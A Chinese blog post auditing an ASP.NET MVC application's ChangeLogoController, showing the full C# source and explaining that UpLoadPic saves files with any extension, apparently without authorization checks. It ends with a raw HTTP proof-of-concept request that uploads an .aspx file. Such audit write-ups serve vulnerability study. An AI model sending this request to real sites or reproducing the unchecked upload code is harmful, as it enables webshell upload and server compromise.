ASP.NET代码审计 MVC架构文件上传漏洞

最新推荐文章于 2025-08-02 20:06:22 发布

摸金校尉-马

最新推荐文章于 2025-08-02 20:06:22 发布

阅读量166

点赞数 3

CC 4.0 BY-SA版权

文章标签： asp.net mvc 架构

本文链接：https://blog.csdn.net/2301_77012231/article/details/149220590

全局找

HttpPostedFileBase

ChangeLogoController.cs代码

using System;
using System.IO;
using System.Web;
using System.Web.Mvc;
using AutoMapper;
using JuCheap.Infrastructure.Extentions;
using JuCheap.Interfaces;
using JuCheap.Models;
using JuCheap.Web.Filters;

namespace JuCheap.Web.Controllers;

public class ChangeLogoController : Controller
{
	private readonly IChangeLogoService _changeLogoService;

	private readonly IUserService _userService;

	private readonly IMapper _mapper;

	public ChangeLogoController(IChangeLogoService changeLogoSvc, IMapper mapper, IUserService UserService)
	{
		_mapper = mapper;
		_changeLogoService = changeLogoSvc;
		_userService = UserService;
	}

	public ActionResult Index()
	{
		return View();
	}

	[IgnoreRightFilter]
	public JsonResult GetData()
	{
		ChangeLogoDto result = _changeLogoService.Find(base.User.Identity.GetLoginUserId());
		return Json(result, JsonRequestBehavior.AllowGet);
	}

	[IgnoreRightFilter]
	public JsonResult UpLoadPic(HttpPostedFileBase file)
	{
		string urlPath = Config.WebUrl + "/UpLoad/Temp";
		string filePathName = string.Empty;
		string localPath = Path.Combine(HttpRuntime.AppDomainAppPath, "UpLoad/Temp");
		if (base.Request.Files.Count == 0)
		{
			return Json(new
			{
				status = false,
				msg = "失败"
			});
		}
		string ex = Path.GetExtension(file.FileName);
		filePathName = Guid.NewGuid().ToString("N") + ex;
		if (!Directory.Exists(localPath))
		{
			Directory.CreateDirectory(localPath);
		}
		file.SaveAs(Path.Combine(localPath, filePathName));
		return Json(new
		{
			status = true,
			fileName = filePathName,
			filePath = urlPath + "/" + filePathName
		});
	}

	[IgnoreRightFilter]
	public JsonResult Edit(string filename, string url, string name, string name1, string value)
	{
		bool result = false;
		if (base.ModelState.IsValid)
		{
			if (filename.IsNotBlank())
			{
				string tempPath = Path.Combine(HttpRuntime.AppDomainAppPath, "UpLoad/Temp");
				string picPath = Path.Combine(HttpRuntime.AppDomainAppPath, "UpLoad/ProjectPic");
				if (url.IsNotBlank())
				{
					string[] array = url.Split('/');
					string oldfile = array[array.Length - 1];
					if (System.IO.File.Exists(Path.Combine(picPath, oldfile)))
					{
						System.IO.File.Delete(Path.Combine(picPath, oldfile));
					}
				}
				System.IO.File.Move(Path.Combine(tempPath, filename), Path.Combine(picPath, filename));
				url = url.Replace("Temp", "ProjectPic");
			}
			result = _changeLogoService.Update(name, url, name1, value);
		}
		return Json(result, JsonRequestBehavior.AllowGet);
	}
}

关键代码

这里的路由是

/ChangeLogo/UpLoadPic

代码解释

上传后的目录位置是 /UpLoad/Temp 文件名是一个时间戳生成的

POC

POST /ChangeLogo/UpLoadPic HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: application/octet-stream

1
------WebKitFormBoundary7MA4YWxkTrZu0gW--

上传成功